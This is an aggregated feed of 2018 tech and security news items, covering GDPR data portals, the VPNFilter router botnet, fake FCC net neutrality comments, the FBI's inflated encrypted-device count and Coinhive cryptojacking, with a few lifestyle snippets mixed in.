PhotoDNA creates a unique signature for an image by converting it to black and white, resizing it, and breaking it into a grid. In each grid cell, the technology finds a histogram of intensity gradients or edges from which it derives its so-called DNA. Images with similar DNA can then be matched.
Given that the amount of data in the DNA is small, large data sets can be scanned quickly, enabling companies including Microsoft, Google, Verizon, Twitter, Facebook and Yahoo to find needles in haystacks and sniff out illegal child abuse imagery. It works even if the images have been resized or cropped.
Davis says that the photo hashing is just one step “to help people who fear an intimate image will be shared without their consent.”
We look forward to learning from this pilot and further improving our tools for people in devastating situations like these.
from Naked Security https://ift.tt/2KROnHe
Microsoft will extend GDPR rights to customers worldwide
Microsoft has announced it will extend the rights that are at the heart of GDPR to all of their consumer customers worldwide.
“Known as Data Subject Rights, they include the right to know what data we collect about you, to correct that data, to delete it and even to take it somewhere else,” Julie Brill, Corporate VP and Deputy General Counsel at Microsoft, explained.
Users can access these tools through Microsoft’s privacy dashboard.
Changes to the dashboard that allow Microsoft to comply with GDPR requirements have already been made in January 2018, when the wider availability of the Windows Diagnostic Data Viewer tool was announced.
A commitment to GDPR and privacy
“GDPR is an important step forward for privacy rights in Europe and around the world, and we’ve been enthusiastic supporters of GDPR since it was first proposed in 2012,” Brill noted.
“We are committed to making sure that our products and services comply with GDPR. That’s why we’ve had more than 1,600 engineers across the company working on GDPR projects. Since its enactment in 2016, we’ve made significant investments to redesign our tools, systems and processes to meet the requirements of GDPR.”
She also noted that changes to the tools can be expected.
“As our customers use our tools and experience other features we’ll also listen to their feedback and suggestions for improvements. Because regulatory interpretations change with experience and changing circumstances over time, we will constantly evaluate our products, services and data uses as understanding of GDPR evolves.”
The company’s GDPR compliance efforts have also resulted in an update of the privacy statement governing their consumer products and services.
As Greg McNeal, Professor of Law & Policy at Pepperdine Law, has pointed out, Microsoft seems to have used the advent of GDPR as an opportunity to achieve privacy goals without suffering a business impact.
It’s also smart business as peer competitors are on defense. Plus it makes MSFT and Azure the platform of choice for those entities looking for a solution that has GDPR type compliance baked in by default, especially as other geos follow policy of Europe.
— Greg McNeal (@GregoryMcNeal) May 22, 2018
from Help Net Security https://ift.tt/2GMx8Vf
European users can request a copy of the data Apple keeps on them
Apple has set up a Data and Privacy portal where users can make a request to download all the data Apple has on them, correct their personal information, deactivate or delete their account.
The creation of the portal is a direct result of the GDPR legislation coming into force today (May 25, 2018) and will be made available to all users.
About the “Get a copy of your data” option
For now, only users from the European Union, Iceland, Liechtenstein, Norway, and Switzerland will be able to download the Apple ID and iCloud data associated with their account. Users from the rest of the world will get the option in the coming months.
“Any data that isn’t provided is either in a form that is not personally identifiable or linked to your Apple ID, is stored in an end-to-end encrypted format that Apple cannot decrypt, or is not stored by Apple at all. Additionally, some data may have been held only for a very short time and is no longer on our servers,” the company explained.
The company promises to make the copy of the Apple ID and iCloud data available within a week. It might seem long for some, but Apple wants to make sure that the request for data was made by the account owner, and that will take a while.
Once the data is ready, users are notified and have two weeks to download it – after that period has passed, the data is automatically deleted. Of course, they can always make a new request.
Other tools
Users are directed to correct their account information via the Settings on their iOS device, System Preferences on their Mac, and via Account Management on appleid.apple.com.
Deactivating or deleting one’s account is as easy as making a few clicks. Again, Apple explains clearly what each action entails and how long the process might take (up to seven days).
from Help Net Security https://ift.tt/2LnRtUB
New infosec products of the week: May 25, 2018
Prioritizing open source security alerts
WhiteSource launched its next-generation Software Composition Analysis solutions – Effective Usage Analysis. The technology provides details beyond simply which components are present in the application, delving deeper with actionable insights on how components are being used, highlighting their impact on the security of the application.
Passwork introduces new password manager
Passwork.me is a new password manager designed to enhance security when working with corporate passwords. Through this password manager, the company can safely store all their passwords and employees can search the right passwords quickly. The administrator controls all the user rights as well as keeps track of any changes or actions taken by the members.
High-reliability packet capture in enterprise networks
DAG Cards natively support a wide range of open source applications including Wireshark, Bro, SNORT, Suricata, and any libpcap application through DAG-enabled libraries. Both the 9.5G4 and 9.5G4F feature standard DAG Card functionality such as interrupt free, zero copy, packet capture direct-to-memory and onboard, hardware-based, filtering, duplication and steering. They also provide on-board processing for a host of enterprise and encapsulation protocols, such as MPLS and VLAN for load balancing, classification and filtering.
Automated threat detection & investigation app for the Palo Alto Networks Application Framework
SecBI unveiled its Autonomous Investigation app for the Palo Alto Networks Application Framework. SecBI’s Autonomous Investigation technology uses network traffic analysis (NTA) based on unsupervised machine learning to detect complex and stealthy cybersecurity threats. Security analysts are presented with the full scope of the suspicious incident’s kill chain, including visibility to all affected users and devices, as well as infection points and malicious communications, enabling fast and complete remediation.
Measure a cyber program’s maturity and residual risk
Kudelski Security announced the U.S. availability of Secure Blueprint. This product provides a centralized system for program management as well as easy-to-use dashboards that deliver a dynamic representation of cyber program maturity, enterprise risks and other information about which CISOs need to engage key stakeholders, allowing them to plan and prioritize cybersecurity investments.
Cognito Recall delivers AI-assisted threat hunting
Vectra announced a major expansion of the Cognito platform with Cognito Recall. It collects, analyzes and stores as much metadata as needed for forensic investigations and compliance mandates like GDPR. It also empowers AI-assisted threat hunting using indicators of compromise and provides a chain of forensic evidence behind every cyberattack.
Exponential‐e launches Cyber Security Operations Centre
Exponential‐e launched its Cyber Security Operations Centre (CSOC), capable of monitoring for compliance to multiple standards, from best practice through to PCI-DSS and ISO 27001. The very nature of this type of monitoring lifts a heavy burden when adhering to regulations such as GDPR.
Cato unveils SD-WAN with cloud-based threat hunting system
The Cato Threat Hunting System leverages traffic context, unobscured network and endpoint visibility to pinpoint threats and reduce dwell time. It represents the first time that threat hunting is done without deploying a dedicated and costly data collection infrastructure within the enterprise.
from Help Net Security https://ift.tt/2GOCuiT
Thursday, May 24, 2018
Monét X Change Knows Sponges Are a Queen's Secret Weapon
New York City drag queen Monét X Change thinks that sponges are the most useful item in your cupboard. In the premiere episode of RuPaul’s Drag Race’s 10th season, the self-proclaimed “Mr. Clean of Drag” created an entire ensemble out of scrubby absorbent pads.
In this video, she shares some of her favorite sponge uses, beyond turning a sickening look on the runway. Scrub through (pun intended) to see how sponges help with beauty, pain, and getting a drag queen’s attention.
from Lifehacker https://ift.tt/2LtnHhi
Earther The EPA Barred Flint’s Representatives From Attending Its Toxic Water Summit [Updated] | The
Earther The EPA Barred Flint’s Representatives From Attending Its Toxic Water Summit [Updated] | The A.V. Club With one episode left, The Americans prepares to make the ultimate sacrifice | The Takeout What if Subway threw a Twitter poll and nobody responded? |
from Lifehacker https://ift.tt/2ILkdok
2 million stolen identities used to make fake net neutrality comments
You may recall all those reports of fake and bot-generated comments left in what former New York Attorney General Eric Schneiderman called the “deeply corrupted” public comment period for net neutrality.
Now, it looks like two million stolen identities were used to make those fake net neutrality comments. Most crucially, two of those identities were stolen from senators.
On Monday, the two senators – Jeff Merkley (D-OR) and Pat Toomey (R-PA) – called on the Federal Communications Commission (FCC) to investigate identity theft and fraud in the public comments left for the agency during the time leading up to the decision to kill net neutrality in December.
From their letter, sent to FCC Chairman Ajit Pai:
Late last year, the identities of as many as two million Americans were stolen and used to file fake comments during the Federal Communications Commission’s (FCC’s) comment period for the net neutrality rule.
We were among those whose identities were misused to express viewpoints we do not hold. We are writing to express our concerns about these fake comments and the need to identify and address fraudulent behavior in the rulemaking process.
A public comment system that isn’t secured in some way can’t protect government agencies such as the FCC from fraudsters who pollute the process, the senators said; nor can it protect participants from having fraudsters assume their identities:
The first three words in our Constitution are, ‘We the People.’ The federal rulemaking process is an essential part of our democracy and allows Americans the opportunity to express their opinions on how government agencies decide important regulatory issues. As such, we are concerned about the aforementioned fraudulent activity. We need to prevent the deliberate misuse of Americans’ personal information and ensure that the FCC is working to protect against current and future vulnerabilities in its system.
Toomey and Merkley called on the FCC to employ simple security measures, such as CAPTCHA, or Completely Automated Procedures for Telling Computers and Humans Apart, to weed out bot-generated comments.
This technology would ensure that a human, not a machine, is using a computer to submit comments.
“Ensure?” Well, that’s giving CAPTCHA a bit more credit than it deserves, given all the ways that human researchers have found to automatically trick the tests.
The point of CAPTCHA or reCAPTCHA challenges is to act as a gateway that lets humans through but stops or slows down bots (software robots). A bot that can solve a CAPTCHA or reCAPTCHA automatically defeats the whole point of the test, but that’s what keeps happening.
But we get the point the senators are trying to make: just do something to stop these bots.
And while you’re at it, the senators want the FCC to figure out who’s behind the fake comments. They also want public disclosure on the total number of fake comments that were filed during the net neutrality public comment period.
The senators also have this list of specific questions for the FCC:
- How is the FCC working with the Department of Justice to identify those who submitted fake comments?
- Is the FCC working with state attorneys general to determine whether state crimes were broken when these identities were stolen?
- What measures is the FCC taking to ensure this does not happen in the future?
- How can the FCC track down who misused the identities of 2 million Americans?
- Can the FCC determine how many of the fake comments on record were submitted by bots, a software application that runs automated tasks (scripts) over the internet?
- Has the FCC considered using a CAPTCHA, or other security technology, to prevent fraudulent machine input?
- Is the FCC aware of any foreign government submitting fake comments and for what purpose?
I don’t know how the FCC will go about finding out which of the 23 million comments it received last year were fake. But for what it’s worth, Gizmodo’s Dell Cameron found one that seemed a pretty cut-and-dried version of BS: it’s doubtful that Barack Obama would speak about his own net neutrality protections in this way:
Seems legit https://t.co/TgizemRNqn
—
dell cameron (@dellcam) December 19, 2017
According to Pew Research, only 6% of the comments were unique. Potentially millions could have been submitted by bots. What’s more, 57% of comments used temporary or duplicate email addresses, and seven popular comments accounted for 38% of all submissions.
The FCC refused to postpone its 14 December vote on net neutrality in order to investigate a public comment period that had obviously been clotted with bots, memes, and input from people who don’t actually exist. At any rate, it wasn’t even interested in hearing to the outpouring of support from Joe Schmoes. Rather, it was zeroing in on legal comments in the submitted content, as Brian Hart, the FCC’s head of media relations, told Wired:
The purpose of a rulemaking proceeding is not to see who can dump the most form letters into a docket. Rather, it is to gather facts and legal arguments so that the Commission can reach a well-supported decision.
Senators, respectfully, forget CAPTCHA. What the FCC really needs to do is to read the how-many-bots analysis carried out by Wired after the FCC declined to look itself at how gunky the comments were. The magazine relied on the help of FiscalNote, a company that processes public comments on behalf of corporations to help them make sense of the policy landscape.
One of the techniques FiscalNote employed (its researchers had previously identified nearly one million bot submissions in the FCC’s comments, all of them opposing net neutrality) was to detect paragraph patterns, such as stringing together 35 synonymous words and phrases in a particular order to form similar, but not identical, comments.
Sources told Gizmodo last year that Pai quietly issued a directive telling the FCC’s staff to back away from filtering out fake comments during the proceeding. Doing so would likely backfire, the thinking went: it could lead to accusations that the agency was censoring pro-net neutrality comments.
Well, that’s fair, actually. Pro- and anti-net-neutrality bots turned that comment process into a bot romper room. From Gizmodo:
Over 7 million comments included the phrase: ‘I am in favor of strong net neutrality under Title II of the Telecommunications Act.’
We may side with one or the other bot groups, but given that WANAL (We, as in most all of us except lawyers, Are Not A Lawyer) the FCC couldn’t give a hoot about what our chattering, identity-thieving, non-legal-argument robots sputter on about.
from Naked Security https://ift.tt/2J69OXY
FBI admits to inflating number of crime-related devices it can’t crack
Investigators can’t get into 7,775 devices, FBI Director Christopher Wray repeatedly claimed in 2017, using the scary statistic to argue for encryption backdoors.
He made the same “this is letting the crooks go dark” argument over and over, including on 7 December, when he testified before the House Judiciary Committee. At that time, he said that selective encryption access is possible without jeopardizing everybody’s device encryption. The need for it is beyond urgent, he said: it’s vital to protect innocent citizens from criminals and terrorists who are using encrypted devices to “go dark.”
Nah, the FBI has now admitted. On Tuesday, The Washington Post reported that the FBI has admitted that the 7,800 number is a “grossly inflated” figment of FBI imagination, or what the FBI is saying is a miscount. It’s more like 1,200… maybe 2,000… honestly, the bureau isn’t really sure how many uncrackables it’s dealing with.
According to The Post, FBI officials say that they first became aware of the miscount about a month ago and still haven’t come up with an accurate count of how many encrypted phones they received as part of criminal investigations last year.
The Post quoted numbers from people who are familiar with the work: last week, they put an internal estimate of the correct number of locked phones at 1,200. Officials anticipate that number to change as they launch a new audit, which could take weeks to complete.
The FBI issued this statement on Tuesday:
The FBI’s initial assessment is that programming errors resulted in significant over-counting of mobile devices reported.
How did the number blow up? The bureau blamed the inaccuracy on the use of three distinct databases, which led to repeated counting of the same phones. People familiar with the work said that when the methodology was tested in April 2016, the tests didn’t reveal the flaw.
OK, so we tripled the number, the FBI said. But that doesn’t mean that “Going Dark” isn’t a “serious problem” for law enforcement. From its statement:
Going Dark remains a serious problem for the FBI, as well as other federal, state, local and international law enforcement partners… The FBI will continue pursuing a solution that ensures law enforcement can access evidence of criminal activity with appropriate legal authority.
How seriously should we take the FBI’s sloppiness with numbers? One way of looking at it is that this attention to an exaggerated number is a cheap shot at the cops. After all, the percentage of devices that are encrypted will increase toward 100%. So if we argue against the FBI now, on the grounds that the number is exaggerated we’ll inevitably be wrong as the FBI’s exaggeration approaches reality.
Another way to approach the inflated number is that the FBI has been using it as a central core of the Department of Justice’s obvious push for backdoors. It’s part of the argument for why baking backdoors into encryption is necessary. But with the news about the number’s inaccuracy comes the realization that the FBI/DOJ’s argument for backdoors is being pushed forward without much care for whether one of its central tenets is in fact true.
from Naked Security https://ift.tt/2knU1G0
VPNFilter malware compromises over 500,000 networking devices around the world
Cisco Talos researchers have flagged a huge botnet of small and home office routers and NAS devices, capable of collecting communications and data and launching cyber attacks.
About the VPNFilter malware
The malware that makes it all possible has been dubbed VPNFilter. It’s persistent, modular, and delivered in several stages.
The stage 1 malware’s main task is to persist through reboots and to discover the IP address of the current stage 2 deployment server.
The stage 2 malware is downloaded from those servers (one of which has been seized by the FBI) and is capable of collecting files, exfiltrating data, managing the device and executing code on it.
Some versions of it also have the capability to overwriting a critical portion of the device’s firmware and rebooting the device, effectively rendering it unusable. Although, as the researchers pointed out, it’s more than likely that the threat actor running the botnet can deploy this self-destruct command to most devices that it controls.
The stage 3 modules are effectively plugins for the stage 2 malware. One can sniff and collect traffic that passes through the device (including theft of website credentials and monitoring of Modbus SCADA protocols), another allows the malware to communicate with the C&C server via Tor. The researchers believe there are other plugins, but so far they’ve only been able to discover and analyze those two.
The data collection capability could be used to assess the potential value of the network that the device serves.
“If the network was deemed as having information of potential interest to the threat actor, they may choose to continue collecting content that passes through the device or to propagate into the connected network for data collection,” the researchers noted.
“At the time of this posting, we have not been able to acquire a third-stage plugin that would enable further exploitation of the network served by the device. However, we have seen indications that it does exist, and we assess that it is highly likely that such an advanced actor would naturally include that capability in malware that is this modular.”
About the VPNFilter botnet and likely botmaster(s)
The botnet has been slowly growing since at least 2016, the researchers say, and currently consists of at least 500,000 infected devices in some 54 countries around the world.
“The known devices affected by VPNFilter are Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well at QNAP network-attached storage (NAS) devices. No other vendors, including Cisco, have been observed as infected by VPNFilter, but our research continues,” they shared.
“The type of devices targeted by this actor are difficult to defend. They are frequently on the perimeter of the network, with no intrusion protection system (IPS) in place, and typically do not have an available host-based protection system such as an anti-virus (AV) package. We are unsure of the particular exploit used in any given case, but most devices targeted, particularly in older versions, have known public exploits or default credentials that make compromise relatively straightforward.”
(More details about the specific targeted devices can be found here.)
The researchers noted that their research is far from complete, but they went public with it because they fear the botnet will soon be used for attacks against targets in the Ukraine.
“The code of this malware overlaps with versions of the BlackEnergy malware — which was responsible for multiple large-scale attacks that targeted devices in Ukraine. While this isn’t definitive by any means, we have also observed VPNFilter, a potentially destructive malware, actively infecting Ukrainian hosts at an alarming rate, utilizing a command and control (C2) infrastructure dedicated to that country. Weighing these factors together, we felt it was best to publish our findings so far prior to completing our research.”
The similarity to BlackEnergy and the recent focus on Ukrainian hosts seem to point to a Russian-backed actor operating the botnet, although it’s impossible to know for sure.
“This is a very sophisticated, multi-stage malware that allows attackers to spy on all network traffic and deploy destructive commands to industrial devices in critical infrastructure networks,” commented Phil Neray, VP of Industrial Cybersecurity at CyberX.
“Russian threat actors have previously used similar tactics in cyberattacks on the Ukrainian electrical grid. While the recent burst of activity also targets the Ukraine, the malware exploits vulnerabilities in devices that are widely used around the world — which means the same attack infrastructure could easily be used to target critical infrastructure networks in the US, the UK, Germany and any other countries seen as enemies of the attackers.”
What to do?
Cisco Talos has created and deployed more than 100 Snort signatures for the publicly known vulnerabilities affecting the devices targeted by VPNFilter, and has engaged in blacklisting the domains associated with the threat.
The company has also notified the manufacturers of those devices about the threat and shared their research with international law enforcement and the Cyber Threat Alliance.
Owners of the affected devices should reboot them to remove the non-persistent malware elements and then reset them to factory defaults, which should get rid of the persistent, stage 1 malware.
They could then get in touch with the manufacturer and get instructions from them on how to make sure the devices are updated to the most recent firmware/software versions. Changing any default credentials is also a good idea, and so is turning off remote management of the device.
Since there’s no easy way to determine whether a device has been compromised by the VPNFilter malware or not, Cisco researchers advise all owners of the targeted SOHO and NAS devices to go through those steps.
from Help Net Security https://ift.tt/2GLnEtA
Wednesday, May 23, 2018
Earther France is Being Invaded By Giant Killer Worms | The A.V.
Earther France is Being Invaded By Giant Killer Worms | The A.V. Club This is the way The Middle ends: not with a bang but a whisper | The Takeout Woman tries the old “razor blade in fast food” scam, gets charged with criminal mischief |
from Lifehacker https://ift.tt/2GFL5EB
Impress Your Guests With Instant Pot Lava Cakes
A dinner party without dessert is no kind of party at all, but there’s no reason to stress yourself out with a croquembouche. Molten chocolate cakes have a decadent 1980s vibe to them, and these babies—which are adapted from this recipe by Queen Nigella—have never failed to impress. Using the Instant Pot means they cook up fresh and hot in under 10 minutes, and you can pre-batch the batter a day (or two) ahead of time—all you have to do the day of is scoop it into ramekins and let the pressure cooker do its thing.
from Lifehacker https://ift.tt/2s2UqBX
How an URL shortener allows malicious actors to hijack visitors’ CPU power
URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero.
About the cnhv.co URL shortener
“If you have an URL you’d like to forward your users to, you can create a cnhv.co shortlink to it. The user has to solves a number of hashes (adjustable by you) and is automatically forwarded to the target URL afterwards,” Coinhive explains.
When users clicks on the link, they first see an interstitial page showing them a progress bar:
Once the specified number of hashes is solved, they are automatically redirected to the destination URL.
Cnhv.co is meant to be used by site owners to monetize traffic from their website visitors so that they don’t have to show ads or so that the visitors don’t have to pay for the content. Ideally, the site owner should outright tell the visitors what the shortener is doing.
Unfortunately, the shortener has also become another way for scummy site owners and attackers who have compromised websites to mine cryptocurrency while the visitors are none the wiser about what’s happening to their computers.
Cryptomining through hidden URL shorteners
In general, the miner JavaScript is loaded only if the visitors clicks on the shortened URL/link. But malicious users have found a way for the mining to be triggered without user interaction.
Sucuri researchers have flagged hundreds of websites that have been injected with iFrames loading the cnhv.co URL shortener, which allows it to be automatically loaded alongside the rest of the web page (no action on the part of the user is needed) and to initiate the mining.
“The miner script is not being directly loaded from your website but rather through the cnhv[.]co website. It adds what could be viewed as an additional layer of ambiguity and thereby helps it evade detection as some major anti-virus/information security companies do not have it listed as suspicious yet, though many will detect it once the main script coinhive.min.js is loaded,” Sucuri’s Luke Leal explains.
But how does all of this remain hidden to the visitor? Well, the malicious actors have had the brilliant idea to set the size of the iFrame to 1×1 (pixels), so that visitors are unlikely to notice the iFrame on the page (it looks like a speck), and would definitely not see the hashing progress bar.
Some other security researchers have also flagged the trick:
#Coinhive found on the website of Union Public Service Commission (India) – https://t.co/ZzPJllNtWz
This is an interesting case of #cryptojacking as it's injecting the short URL form of Coinhive (cnhv[.]co) via the code shown in the screenshot.
cc: @fs0c131y pic.twitter.com/b4GAI1HIEs
— Bad Packets Report (@bad_packets) March 16, 2018
According to Leal, some of the sites using the trick appear to have been compromised, but others seem not to be – its owners are intentionally using the iFrame to stealth cryptomine from their visitors.
“There needs to be an increased focus on adding controls so that this type of blatant abuse can be stopped, or at least greatly reduced. As it stands, it seems to be too easy for this abuse to occur injuring the credibility of legitimate websites who want to ethically use cryptomining as a form of monetization,” he noted.
from Help Net Security https://ift.tt/2ki5Mxv